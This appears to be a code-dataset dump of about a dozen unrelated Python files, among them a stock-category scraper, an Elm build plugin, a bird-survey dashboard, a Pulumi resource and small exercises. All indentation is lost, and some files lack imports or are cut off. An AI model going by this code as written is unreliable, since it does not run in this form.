from zvt.api.common import china_stock_code_to_id
from zvt.api.quote import get_entities
from zvt.domain import StockIndex, StockCategory
from zvt.domain.stock_meta import Index
from zvdata.utils.utils import json_callback_param
class ChinaStockCategoryRecorder(Recorder):
provider = 'eastmoney'
data_schema = StockIndex
# 用于抓取行业/概念/地域列表
category_map_url = {
StockCategory.industry: 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C._BKHY&sty=DCRRBKCPAL&st=(ChangePercent)&sr=-1&p=1&ps=200&lvl=&cb=jsonp_F1A61014DE5E45B7A50068EA290BC918&token=4f1862fc3b5e77c150a2b985b12db0fd&_=08766',
StockCategory.concept: 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C._BKGN&sty=DCRRBKCPAL&st=(ChangePercent)&sr=-1&p=1&ps=300&lvl=&cb=jsonp_3071689CC1E6486A80027D69E8B33F26&token=4f1862fc3b5e77c150a2b985b12db0fd&_=08251',
StockCategory.area: 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C._BKDY&sty=DCRRBKCPAL&st=(ChangePercent)&sr=-1&p=1&ps=200&lvl=&cb=jsonp_A597D4867B3D4659A203AADE5B3B3AD5&token=4f1862fc3b5e77c150a2b985b12db0fd&_=02443'
}
# 用于抓取行业包含的股票
category_stocks_url = 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C.{}{}&sty=SFCOO&st=(Close)&sr=-1&p=1&ps=300&cb=jsonp_B66B5BAA1C1B47B5BB9778045845B947&token=7bc05d0d4c3c22ef9fca8c2a912d779c'
def __init__(self, batch_size=10, force_update=False, sleeping_time=10) -> None:
super().__init__(batch_size, force_update, sleeping_time)
self.indices = get_entities(session=self.session, entity_type='index', exchanges=['cn'],
return_type='domain', provider=self.provider)
self.index_ids = [index_item.id for index_item in self.indices]
def run(self):
for category, url in self.category_map_url.items():
resp = requests.get(url)
results = json_callback_param(resp.text)
for result in results:
items = result.split(',')
code = items[1]
name = items[2]
id = 'index_cn_{}'.format(code)
if id in self.index_ids:
continue
self.session.add(Index(id=id, entity_id=id, entity_type='index', exchange='cn', code=code, name=name,
category=category.value))
self.session.commit()
indices = get_entities(session=self.session, entity_type='index',
return_type='domain', filters=[
Index.category.in_(
[StockCategory.concept.value, StockCategory.industry.value])],
provider=self.provider)
for index_item in indices:
resp = requests.get(self.category_stocks_url.format(index_item.code, '1'))
try:
results = json_callback_param(resp.text)
the_list = []
for result in results:
items = result.split(',')
stock_code = items[1]
stock_id = china_stock_code_to_id(stock_code)
index_id = index_item.id
the_list.append({
'id': '{}_{}'.format(index_id, stock_id),
'index_id': index_id,
'stock_id': stock_id
})
if the_list:
df = pd.DataFrame.from_records(the_list)
df_to_db(data_schema=self.data_schema, df=df, provider=self.provider)
self.logger.info('finish recording index:{},{}'.format(index_item.category, index_item.name))
except Exception as e:
self.logger.error("error:,resp.text:", e, resp.text)
self.sleep()
if __name__ == '__main__':
# init_process_log('china_stock_category.log')
recorder = ChinaStockCategoryRecorder()
recorder.run()
|
python
|
import json
import re
import string
try: # ST3
from .elm_plugin import *
from .elm_project import ElmProject
except: # ST2
from elm_plugin import *
from elm_project import ElmProject
default_exec = import_module('Default.exec')
@replace_base_class('Highlight Build Errors.HighlightBuildErrors.ExecCommand')
class ElmMakeCommand(default_exec.ExecCommand):
# inspired by: http://www.sublimetext.com/forum/viewtopic.php?t=12028
def run(self, error_format, info_format, syntax, color_scheme, null_device, warnings, **kwargs):
self.buffer = b''
self.warnings = warnings == "true"
self.error_format = string.Template(error_format)
self.info_format = string.Template(info_format)
self.run_with_project(null_device=null_device, **kwargs)
self.style_output(syntax, color_scheme)
def run_with_project(self, cmd, working_dir, null_device, **kwargs):
file_arg, output_arg = cmd[1:3]
project = ElmProject(file_arg)
log_string('project.logging.settings', repr(project))
if '{output}' in output_arg:
cmd[1] = fs.expanduser(project.main_path)
output_path = fs.expanduser(project.output_path)
cmd[2] = output_arg.format(output=output_path)
else:
# cmd[1] builds active file rather than project main
cmd[2] = output_arg.format(null=null_device)
project_dir = project.working_dir or working_dir
# ST2: TypeError: __init__() got an unexpected keyword argument 'syntax'
super(ElmMakeCommand, self).run(cmd, working_dir=project_dir, **kwargs)
def style_output(self, syntax, color_scheme):
self.output_view.set_syntax_file(syntax)
self.output_view.settings().set('color_scheme', color_scheme)
if self.is_patched:
self.debug_text = ''
else:
self.debug_text = get_string('make.missing_plugin')
def on_data(self, proc, data):
self.buffer += data
def on_finished(self, proc):
result_strs = self.buffer.decode(self.encoding).split('\n')
flat_map = lambda f ,xss: sum(map(f, xss), [])
output_strs = flat_map(self.format_result, result_strs) + ['']
output_data = '\n'.join(output_strs).encode(self.encoding)
super(ElmMakeCommand, self).on_data(proc, output_data)
super(ElmMakeCommand, self).on_finished(proc)
def format_result(self, result_str):
decode_error = lambda dict: self.format_error(**dict) if 'type' in dict else dict
try:
data = json.loads(result_str, object_hook=decode_error)
return [s for s in data if s is not None]
except ValueError:
log_string('make.logging.invalid_json', result_str)
info_str = result_str.strip()
return [self.info_format.substitute(info=info_str)] if info_str else []
def format_error(shelf, type, file, region, tag, overview, details, **kwargs):
if type == 'warning' and not shelf.warnings:
return None
line = region['start']['line']
column = region['start']['column']
message = overview
if details:
message += '\n' + re.sub(r'(\n)+', r'\1', details)
# TypeError: substitute() got multiple values for argument 'self'
# https://bugs.python.org/issue23671
return shelf.error_format.substitute(**locals())
|
python
|
import numpy as np
import matplotlib.pyplot as plt
def get_steps_colors(values):
values = 1 / values
_range = np.max(values) - np.min(values)
_values = (values - np.min(values)) / _range
colors_data = plt.cm.Wistia(_values)
return colors_data
def paint_table(df, title_cols, title_text, result_path, fontsize=-1, fig_background_color='white', fig_border='white'):
df = df.copy()
df = df.applymap(lambda x: x[:15] + '...' if isinstance(x, str) and len(x) > 15 else x)
# Get headers
footer_text = ''
cols_header = df.columns
cols_header_data = df.columns[1:]
if title_cols != None:
cols_header_data = df.columns[len(title_cols):]
df_data = df[cols_header_data]
# Get data
cell_text = []
for i, row in df.iterrows():
data_row = list(row.values[0:len(title_cols)]) + [f'{x:1.3f}' for x in row.values[len(title_cols):]]
cell_text.append(data_row)
# Get colors
colors_cells = []
for i, row in df_data.iterrows():
colors_data = get_steps_colors(row.values)
colors_row = np.append(plt.cm.binary(np.full(len(title_cols), 1)), colors_data, axis=0)
colors_cells.append(colors_row)
colors_header = plt.cm.binary(np.full(len(cols_header), 1))
# Figure
plt.figure(linewidth=2,
edgecolor=fig_border,
facecolor=fig_background_color,
tight_layout={'pad': 1},
# figsize=(5,3)
)
# plt.rcParams.update({"font.size": 20})
the_table = plt.table(cellText=cell_text,
cellColours=colors_cells,
rowLoc='right',
colColours=colors_header,
colLabels=cols_header,
loc='center')
# Set font size if user set it
if fontsize > 0:
the_table.auto_set_font_size(False)
the_table.set_fontsize(fontsize)
the_table.scale(1, 1.5)
# Hide axes
ax = plt.gca()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Hide axes border
plt.box(on=None)
# Add title
cell_height = the_table[0, 0].get_height()
center = 0.5
distance_cell_title = 0.02
y = center + cell_height * (df.shape[0] + 1) / 2 + distance_cell_title
plt.suptitle(title_text, y=y)
# Add footer
plt.figtext(0.95, 0.05, footer_text, horizontalalignment='right', size=6, weight='light')
# Force the figure to update, so backends center objects correctly within the figure.
# Without plt.draw() here, the title will center on the axes and not the figure.
plt.draw()
# Create image. plt.savefig ignores figure edge and face colors, so map them.
fig = plt.gcf()
plt.savefig(result_path,
# bbox='tight',
edgecolor=fig.get_edgecolor(),
facecolor=fig.get_facecolor(),
dpi=400
)
|
python
|
import binascii
import logging
from lbrynet.core.cryptoutils import get_lbry_hash_obj, verify_signature
from twisted.internet import defer, threads
from lbrynet.core.Error import DuplicateStreamHashError, InvalidStreamDescriptorError
from lbrynet.lbrylive.LiveBlob import LiveBlobInfo
from lbrynet.interfaces import IStreamDescriptorValidator
from zope.interface import implements
log = logging.getLogger(__name__)
LiveStreamType = "lbrylive"
def save_sd_info(stream_info_manager, sd_info, ignore_duplicate=False):
log.debug("Saving info for %s", str(sd_info['stream_name']))
hex_stream_name = sd_info['stream_name']
public_key = sd_info['public_key']
key = sd_info['key']
stream_hash = sd_info['stream_hash']
raw_blobs = sd_info['blobs']
crypt_blobs = []
for blob in raw_blobs:
length = blob['length']
if length != 0:
blob_hash = blob['blob_hash']
else:
blob_hash = None
blob_num = blob['blob_num']
revision = blob['revision']
iv = blob['iv']
signature = blob['signature']
crypt_blobs.append(LiveBlobInfo(blob_hash, blob_num, length, iv, revision, signature))
log.debug("Trying to save stream info for %s", str(hex_stream_name))
d = stream_info_manager.save_stream(stream_hash, public_key, hex_stream_name,
key, crypt_blobs)
def check_if_duplicate(err):
if ignore_duplicate is True:
err.trap(DuplicateStreamHashError)
d.addErrback(check_if_duplicate)
d.addCallback(lambda _: stream_hash)
return d
def get_sd_info(stream_info_manager, stream_hash, include_blobs):
d = stream_info_manager.get_stream_info(stream_hash)
def format_info(stream_info):
fields = {}
fields['stream_type'] = LiveStreamType
fields['stream_name'] = stream_info[2]
fields['public_key'] = stream_info[0]
fields['key'] = stream_info[1]
fields['stream_hash'] = stream_hash
def format_blobs(blobs):
formatted_blobs = []
for blob_hash, blob_num, revision, iv, length, signature in blobs:
blob = {}
if length != 0:
blob['blob_hash'] = blob_hash
blob['blob_num'] = blob_num
blob['revision'] = revision
blob['iv'] = iv
blob['length'] = length
blob['signature'] = signature
formatted_blobs.append(blob)
fields['blobs'] = formatted_blobs
return fields
if include_blobs is True:
d = stream_info_manager.get_blobs_for_stream(stream_hash)
else:
d = defer.succeed([])
d.addCallback(format_blobs)
return d
d.addCallback(format_info)
return d
class LBRYLiveStreamDescriptorValidator(object):
implements(IStreamDescriptorValidator)
def __init__(self, raw_info):
self.raw_info = raw_info
def validate(self):
log.debug("Trying to validate stream descriptor for %s", str(self.raw_info['stream_name']))
hex_stream_name = self.raw_info['stream_name']
public_key = self.raw_info['public_key']
key = self.raw_info['key']
stream_hash = self.raw_info['stream_hash']
h = get_lbry_hash_obj()
h.update(hex_stream_name)
h.update(public_key)
h.update(key)
if h.hexdigest() != stream_hash:
raise InvalidStreamDescriptorError("Stream hash does not match stream metadata")
blobs = self.raw_info['blobs']
def check_blob_signatures():
for blob in blobs:
length = blob['length']
if length != 0:
blob_hash = blob['blob_hash']
else:
blob_hash = None
blob_num = blob['blob_num']
revision = blob['revision']
iv = blob['iv']
signature = blob['signature']
hashsum = get_lbry_hash_obj()
hashsum.update(stream_hash)
if length != 0:
hashsum.update(blob_hash)
hashsum.update(str(blob_num))
hashsum.update(str(revision))
hashsum.update(iv)
hashsum.update(str(length))
if not verify_signature(hashsum.digest(), signature, public_key):
raise InvalidStreamDescriptorError("Invalid signature in stream descriptor")
return threads.deferToThread(check_blob_signatures)
def info_to_show(self):
info = []
info.append(("stream_name", binascii.unhexlify(self.raw_info.get("stream_name"))))
return info
def get_length_of_stream(self):
return None
|
python
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JdZhilianItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
companyname = scrapy.Field()
joblink = scrapy.Field()
salary = scrapy.Field()
workplace = scrapy.Field()
updatetime = scrapy.Field()
jobtype = scrapy.Field()
workexperience = scrapy.Field()
education = scrapy.Field()
recrunumbers = scrapy.Field()
jobcategory = scrapy.Field()
jobdetails = scrapy.Field()
crawltime = scrapy.Field()
companyinfo = scrapy.Field()
|
python
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from django_plotly_dash import DjangoDash
import dash_table
import dash_bootstrap_components as dbc
import plotly.graph_objs as go
import plotly.express as px
import random
import json
import pandas as pd
import numpy as np
import datetime
import names
import re
from fall.models import SurveyObs, Survey
import eb_passwords
from collections import Counter
'''
for team dash board
I can use pathname to deside the contents
'''
DEMO_MODE = True
app = DjangoDash(
'OneTeam',
add_bootstrap_links=True,
) # replaces dash.Dash
teams = ['彩鷸隊', '家燕隊', '大冠鷲隊']
'''
team = 0, 1, 2
'''
def team_thumbnail_content(team):
if team == 2:
return html.Div([
html.Img(src='/static/img/fall/forestbird.png', className='px-3'),
html.H4('大冠鷲隊成績', className='text-center pt-3')
])
if team == 1:
return html.Div([
html.Img(src='/static/img/fall/citybird.png', className='px-3'),
html.H4('家燕隊成績', className='text-center pt-3')
])
return html.Div([
html.Img(src='/static/img/fall/farmbird.png', className='px-3'),
html.H4('彩鷸隊成績', className='text-center pt-3')
])
def team_datatable(team, w):
text_size = '1vw'
table_height = '30vh'
if w < 768:
text_size = '4vw'
table_height = '40vh'
if datetime.date.today() < datetime.date(2020,10,1):
records = SurveyObs.objects.filter(survey__team = '黑面琵鷺隊', survey__is_valid=True).values('survey__checklist_id','species_name', 'amount')
else:
records = SurveyObs.objects.filter(survey__team = teams[team], survey__is_valid=True).values('survey__checklist_id','species_name', 'amount')
df = pd.DataFrame.from_records(records)
if len(df) == 0:
odf = pd.DataFrame({})
else:
NameValidTable = pd.read_csv('../helper_files/NameValid.csv').fillna('缺值')
CNAME = NameValidTable.CNAME.tolist()
ENAME = NameValidTable.ENAME.tolist()
re_spe = []
for s in df.species_name:
ns = re.sub(r' ?\(.*?\)','',s)
if s[0].isupper():
if s in ENAME:
re_spe.append(CNAME[ENAME.index(s)])
elif ns in ENAME:
re_spe.append(CNAME[ENAME.index(ns)])
else:
re_spe.append('not valid')
else:
if s in CNAME:
re_spe.append(s)
elif ns in CNAME:
re_spe.append(ns)
else:
re_spe.append('not valid')
df['ValidSpecies'] = re_spe
spe = list(set(re_spe))
counts = []
samples = []
tname = []
for s in spe:
if s == 'not valid': continue
counts.append(sum(df[df.ValidSpecies==s].amount))
samples.append(len(df[df.ValidSpecies==s]))
tname.append(s)
odf = pd.DataFrame(dict(物種=tname,總數量=counts,清單數=samples))
NTD = []
TO = NameValidTable.TAXON_ORDER
for n in tname:
NTD.append(TO[CNAME.index(n)])
odf['TO'] = NTD
odf.sort_values(by=['TO'],inplace=True)
odf = odf[['物種','總數量','清單數']].reset_index(drop=True)
final_table = dash_table.DataTable(
data = odf.to_dict('records'),
columns=[{'id': c, 'name': c} for c in odf.columns],
fixed_rows={ 'headers': True, 'data': 0 },
style_as_list_view=True,
filter_action='native',
sort_action='native',
page_action='none',
style_cell={'minWidth': '30px','width': '30px','maxWidth': '30px','font-size':text_size,'textAlign':'center'},
style_header={'background':'rgb(114 157 84)','color':'#fff','font-weight':'600','border':'1px solid #000','border-radius': '2vh 2vh 0 0'},
style_data={'whiteSpace': 'normal','height': 'auto'},
style_table={'height': table_height,'maxHeight':'70vh'},
)
return final_table
# prevent setup complex map twice
def empty_map():
fig = go.Figure(go.Scattermapbox(lat=['38.91427',],lon=['-77.02827',]))
fig.update_layout(
mapbox=dict(
center=dict(lat=23.973793,lon=120.979703),
zoom=8,
style='white-bg')
)
return fig
def team_map(team, w):
zoom = 9
if w < 768: zoom = 8
with open('../helper_files/TaiwanCounties_simple.geojson') as f:
geoj = json.load(f)
data = pd.DataFrame()
NorthTaiwan_geo = []
for f in geoj['features']:
if f['properties']['COUNTYNAME'] in ['新北市', '臺北市']:
NorthTaiwan_geo.append(f)
geoj['features'] = NorthTaiwan_geo
RN = []
for k in range(len(geoj['features'])):
temp = geoj['features'][k]['properties']['COUNTYNAME']+geoj['features'][k]['properties']['TOWNNAME']
geoj['features'][k]['id'] = temp
RN.append(temp)
# and insert id to df
data['Name'] = RN
'''
prepare the map data, the team color with most checklist in each town
'''
if datetime.date.today() < datetime.date(2020, 10, 1):
data['NC'] = np.random.randint(0, 40, len(data))
else:
towns = Survey.objects.filter(team=teams[team], is_valid=True).values_list('county',flat=True)
if len(towns) == 0: return empty_map()
county_counts = Counter(towns)
nc = [0] * len(RN)
for t in county_counts:
nc[RN.index(t)] = county_counts[t]
data['NC'] = nc
area_map = px.choropleth_mapbox(data, geojson=geoj, color="NC",
locations="Name",center={"lat": 24.9839, "lon":121.65},
mapbox_style="carto-positron", zoom=zoom, hover_data=['NC'],
color_continuous_scale="Greens",
)
area_map.update_traces(
hovertemplate='%{location} 已上傳%{customdata}筆清單!<extra></extra>',
hoverlabel=dict(font=dict(size=16)),
# showlegend=False,
marker=dict(line=dict(width=1,color='#000')),
)
area_map.update_layout(
mapbox = dict(
accesstoken=eb_passwords.map_box_api_key,
),
margin={"r":0,"t":0,"l":0,"b":0},
coloraxis=dict(
colorbar = dict(
title='上傳清單數',
thicknessmode='fraction',
thickness = 0.02,
yanchor="top",
y=0.99,
xanchor="left",
x=0.01,
bgcolor='rgba(0,0,0,0)')),
# this is a severe bug, dragmode = False should just remove drag, but its not working for me...
)
return area_map
def draw_bar(values, names, w):
values = values[::-1]
names = names[::-1]
# for case that the total df is empty, when the chanllenge just begun, and no data can be scraped yet!
empty_plot = False
if len(values) == 0:
empty_plot = True
values= [0] * 5
names = [''] * 5
else:
try:
if len(values) < 5:
t = [0] * (5 - len(values))
values = t + values
t = [' '] * (5 - len(names))
names = t + names
except:
empty_plot = True
values= [0] * 5
names = [''] * 5
m_names = []
if w < 768:
for n in names:
c_ord = sum([ord(c) for c in n])
if (c_ord > 40000 and len(n)> 6) or (len(n) > 15):
if c_ord > 40000:
m_names.append(n[:6]+'...')
else:
m_names.append(n[:12]+'...')
else:
m_names.append(n)
else:
for n in names:
c_ord = sum([ord(c) for c in n])
if (c_ord > 60000 and len(n)> 12) or (len(n) > 30):
if c_ord > 40000:
m_names.append(n[:12]+'...')
else:
m_names.append(n[:30]+'...')
else:
m_names.append(n)
data = [go.Bar(x = values,
y = [1,2,3,4,5],
width=[0.5, 0.5, 0.5, 0.5, 0.5],
marker_color='#5EA232',
orientation='h',
hoverinfo = 'text',
hovertext = [f'{n}: {v}' for n,v in zip(names, values)]),
go.Scatter(x = [max(values) * -0.75] * 5,
y = [1,2,3,4,5],
text=[f'<b>{n}</b>' for n in m_names], # this line to fix final issue...
mode = 'text',
textposition="middle right",
textfont=dict(color="black",
family='Noto Sans TC',
size=12,),
hoverinfo='none'),
]
# set color issue
anno_text = [f'<b>{n}</b>' if n > 0 else ' ' for n in values]
if not empty_plot:
data += [go.Scatter(x = [max(values) * 0.05] * 5,
y = [1,2,3,4,5],
text=anno_text,
mode = 'text',
textposition="middle right",
textfont=dict(
color='white',
family='Noto Sans TC',
size=14),
hoverinfo='none')]
if empty_plot:
layout = go.Layout(
annotations=[go.layout.Annotation(x=0.5, y=3,xref="x",yref="y",
text="NO DATA YET!",showarrow=False,
font=dict(family='Noto Sans TC',size=32)
)],
margin=dict(l=0,r=0,b=0,t=0),
dragmode = False,
xaxis=dict(range=[0,1],showticklabels=False,showgrid=False,zeroline=False),
yaxis=dict(showticklabels=False,showgrid=False,zeroline=False),
showlegend=False,
font=dict(family='Noto Sans TC'),
plot_bgcolor='rgba(0,0,0,0)',
paper_bgcolor='rgba(0,0,0,0)',)
else:
layout = go.Layout(shapes = [go.layout.Shape(type="line",x0= max(values) * -0.1,x1=max(values) * -0.1,y0=1,y1=5)],
margin=dict(l=0,r=0,b=0,t=0),
dragmode = False,
xaxis=dict(range=[max(values) * -0.75, max(values)],
tickvals = [0, int(max(values) / 2), max(values)],
showgrid=False,zeroline=False),
yaxis=dict(showticklabels=False,showgrid=False,zeroline=False),
showlegend=False,
font=dict(family='Noto Sans TC'),
plot_bgcolor='rgba(0,0,0,0)',
paper_bgcolor='rgba(0,0,0,0)',
)
fig = go.Figure(data=data, layout=layout)
return fig
def bar1_content(team, w):
if datetime.date.today() < datetime.date(2020, 10, 1):
creators = Survey.objects.filter(team='黑面琵鷺隊', is_valid=True).values_list('creator', flat=True)
else:
creators = Survey.objects.filter(team=teams[team], is_valid=True).values_list('creator', flat=True)
ucreators = list(set(creators))
ns = [] #number of species
for c in ucreators:
raw_species_list = SurveyObs.objects.filter(survey__creator=c, survey__is_valid=True).values_list('species_name', flat=True)
ns.append(len(set([re.sub(r' ?\(.*?\)', '', s) for s in raw_species_list])))
ns_c = sorted(zip(ns,ucreators))[::-1] #tuple of (number of species, creator)
return html.Div([
dbc.Row([
dbc.Col(html.Div('上傳鳥種數排名',className='bar_title'),md=7),
],align='baseline', className='pt-2'),
html.Hr(),
dcc.Graph(figure=draw_bar([i[0] for i in ns_c[0:5]], [i[1] for i in ns_c[0:5]], w),config=dict(displayModeBar=False),className='bar_style'),
html.Hr()
])
def bar2_content(team, w):
if datetime.date.today() < datetime.date(2020, 10, 1):
creators = Survey.objects.filter(team='黑面琵鷺隊', is_valid=True).values_list('creator', flat=True)
else:
creators = Survey.objects.filter(team=teams[team], is_valid=True).values_list('creator', flat=True)
ucreators = list(set(creators))
ta = [] #total amount
for c in ucreators:
ta.append(sum(SurveyObs.objects.filter(survey__creator=c, survey__is_valid=True).values_list('amount', flat=True)))
ta_c = sorted(zip(ta,ucreators))[::-1] #tuple of (total amount, creator)
return html.Div([
dbc.Row([
dbc.Col(html.Div('上傳鳥隻數排名',className='bar_title'),md=7),
],align='baseline', className='pt-2'),
html.Hr(),
dcc.Graph(figure=draw_bar([i[0] for i in ta_c[0:5]], [i[1] for i in ta_c[0:5]], w),config=dict(displayModeBar=False),className='bar_style'),
html.Hr()
])
def bar3_content(team, w):
if datetime.date.today() < datetime.date(2020, 10, 1):
creators = Survey.objects.filter(team='黑面琵鷺隊', is_valid=True).values_list('creator', flat=True)
else:
creators = Survey.objects.filter(team=teams[team], is_valid=True).values_list('creator', flat=True)
ucreators = list(set(creators))
tl = [] #total list
for c in ucreators:
tl.append(len(Survey.objects.filter(creator=c, is_valid=True).values_list('checklist_id', flat=True)))
tl_c = sorted(zip(tl,ucreators))[::-1] #tuple of (total amount, creator)
return html.Div([
dbc.Row([
dbc.Col(html.Div('上傳清單數排名',className='bar_title'),md=7),
],align='baseline', className='pt-2'),
html.Hr(),
dcc.Graph(figure=draw_bar([i[0] for i in tl_c[0:5]], [i[1] for i in tl_c[0:5]], w),config=dict(displayModeBar=False),className='bar_style'),
html.Hr()
])
app.layout = html.Div([
dbc.Row([
dbc.Col(className='img_flex_center',md=3,id='team_thumbnail'),
dbc.Col([
dbc.Row([
dbc.Col(md=6, id='team_datatable'),
dbc.Col(dcc.Graph(id='team_map',figure=empty_map(),config=dict(displayModeBar=False)),md=6),
],),
dbc.Row([
dbc.Col(md=4, id='bar1'),
dbc.Col(md=4, id='bar2'),
dbc.Col(md=4, id='bar3'),
], className='bar_card')
],md=9)
], className=''),
dcc.Location(id='url'),
html.Div('',id='empty',style={'display':'none'})
], className='dashboard_container', id='team_container')
app.clientside_callback(
"""
function(path) {
console.log(path)
return path+',' + String(window.innerWidth) + ',' + String(window.innerHeight);
}
""",
Output('empty', 'children'),
[Input('url', 'pathname')]
)
@app.callback(
[Output('team_thumbnail', 'children'),
Output('team_datatable', 'children'),
Output('team_map', 'figure'),
Output('bar1', 'children'),
Output('bar2', 'children'),
Output('bar3', 'children'),],
[Input('empty', 'children')], prevent_initial_call = True
)
def on_page_load(init_info):
path = init_info.split(',')[0]
w = int(init_info.split(',')[1])
h = int(init_info.split(',')[2])
if (path.split('/')[-2]) == 'team3':
return team_thumbnail_content(2), team_datatable(2, w), team_map(2, w), bar1_content(2, w), bar2_content(2, w), bar3_content(2, w)
if (path.split('/')[-2]) == 'team2':
return team_thumbnail_content(1), team_datatable(1, w), team_map(1, w), bar1_content(1, w), bar2_content(1, w), bar3_content(1, w)
return team_thumbnail_content(0), team_datatable(0, w), team_map(0, w), bar1_content(0, w), bar2_content(0, w), bar3_content(0, w)
|
python
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
from .. import utilities, tables
class Lien(pulumi.CustomResource):
def __init__(__self__, __name__, __opts__=None, origin=None, parent=None, reason=None, restrictions=None):
"""Create a Lien resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, str):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if not origin:
raise TypeError('Missing required property origin')
__props__['origin'] = origin
if not parent:
raise TypeError('Missing required property parent')
__props__['parent'] = parent
if not reason:
raise TypeError('Missing required property reason')
__props__['reason'] = reason
if not restrictions:
raise TypeError('Missing required property restrictions')
__props__['restrictions'] = restrictions
__props__['create_time'] = None
__props__['name'] = None
super(Lien, __self__).__init__(
'gcp:resourcemanager/lien:Lien',
__name__,
__props__,
__opts__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
python
|
from glob import glob
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
def main():
file = "./cpp/tests/bin/Distribution_bucket_0_15_08_2021.dat"
df = pd.read_csv(
file, delim_whitespace=True, header=None, names=["id", "x", "px", "y", "py", "t", "delta"]
)
df["turn"] = df.groupby("id").cumcount() + 1
dfg = df.groupby("turn")
emitfile = "./cpp/tests/bin/CTE_Emittances_0_15_08_2021.dat"
dfe = pd.read_csv(
emitfile, delim_whitespace=True, header=None, names=["id", "ex", "ey", "sigs", "sige"]
)
plt.ion()
fig = plt.figure(constrained_layout=True, figsize=(14, 10))
# create plot grid
gs = fig.add_gridspec(2, 4)
# create subplots and set titles
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[0, 1])
ax3 = fig.add_subplot(gs[0, 2:])
ax4 = fig.add_subplot(gs[1, 0])
ax5 = fig.add_subplot(gs[1, 1])
ax6 = fig.add_subplot(gs[1, 2])
ax7 = fig.add_subplot(gs[1, 3])
ax1.set_title(r"$x-p_x$ init")
ax2.set_title(r"$y-p_y$ init")
ax3.set_title(r"$t-d\gamma$ init")
ax4.set_title(r"L ip1")
ax5.set_title(r"L ip2")
ax6.set_title(r"L ip5")
ax7.set_title(r"L ip8")
ex_plot = ax4.plot([], [], marker=".", linestyle="-")[0]
ey_plot = ax5.plot([], [], marker=".", linestyle="-")[0]
sigs_plot = ax6.plot([], [], marker=".", linestyle="-")[0]
for turn, g in dfg:
ax1.scatter(g["x"], g["px"], s=3)
ax2.scatter(g["y"], g["py"], s=3)
ax3.scatter(g["t"].values, g["delta"].values, s=3)
ex_plot.set_xdata(np.append(ex_plot.get_xdata(), [turn]))
ex_plot.set_ydata(np.append(ex_plot.get_ydata(), [dfe.loc[dfe["id"] == turn - 1, "ex"]]))
ey_plot.set_xdata(np.append(ey_plot.get_xdata(), [turn]))
ey_plot.set_ydata(np.append(ey_plot.get_ydata(), [dfe.loc[dfe["id"] == turn - 1, "ey"]]))
sigs_plot.set_xdata(np.append(sigs_plot.get_xdata(), [turn]))
sigs_plot.set_ydata(
np.append(sigs_plot.get_ydata(), [dfe.loc[dfe["id"] == turn - 1, "sigs"]])
)
plt.draw()
ax1.set_xlim(-0.001, 0.001)
ax2.set_xlim(-0.001, 0.001)
ax3.set_xlim(0, 1.5e-9)
ax1.set_ylim(-0.001, 0.001)
ax2.set_ylim(-0.001, 0.001)
ax3.set_ylim(-1e-2, 1e-2)
ax4.set_xlim(0, 100)
ax4.set_ylim(0, 1e-8)
ax5.set_xlim(0, 100)
ax5.set_ylim(0, 1e-9)
ax6.set_xlim(0, 100)
ax6.set_ylim(0, 1e-2)
ax7.set_xlim(0, 100)
plt.pause(0.1)
ax1.cla()
ax2.cla()
ax3.cla()
# plt.show()
plt.ioff()
if __name__ == "__main__":
main()
|
python
|
dividendo=int(input("Dividendo es: "))
divisor=int(input("Divisor es: "))
if dividendo>0 and divisor>0:
coc=0
residuo=dividendo
while (residuo>=divisor):
residuo-=divisor
coc+=1
print(residuo)
print(coc)
|
python
|
from __future__ import unicode_literals
from sideboard.lib import mainloop
if __name__ == '__main__':
mainloop()
|
python
|
import json
from helper import OuraModel, from_json
class UserInfo(OuraModel):
_KEYS = ['age', 'weight', 'gender', 'email']
if __name__ == '__main__':
test = """
{
"age": 27,
"weight": 80,
"email": "[email protected]",
"surprise" : "wow this is new"
}"""
u = from_json(test, UserInfo)
print(u)
|
python
|
# Date: 05/10/2018
# Author: Pure-L0G1C
# Description: Wrapper for gimme object
from .gimme import Gimme
class Wrapper(object):
def __init__(self, kwargs):
self.gimme = Gimme(kwargs)
@property
def start(self):
self.gimme.start()
@property
def stop(self):
self.gimme.stop()
@property
def get(self):
return self.gimme.proxies.get()
@property
def size(self):
return self.gimme.proxies.lsize
|
python
|
def implode(lst):
s = ""
for e in lst:
s = s+e
return s
print(implode(['h', 'e', 'l', 'l', 'o']))
|
python
|
# Generated by Django 3.2.3 on 2021-05-21 21:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cities', '0002_phone'),
]
operations = [
migrations.RenameField(
model_name='phone',
old_name='phone_model',
new_name='model',
),
]
|
python
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os.path
import warnings
import shutil
import json
import tests.test_helpers as th
import submission_validator
class TestSubmissionValidatorValidateDetections(th.ExtendedTestCase):
def test_errors_for_missing_label_probs(self):
with self.assertRaises(KeyError) as cm:
submission_validator.validate_detections([{
# 'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
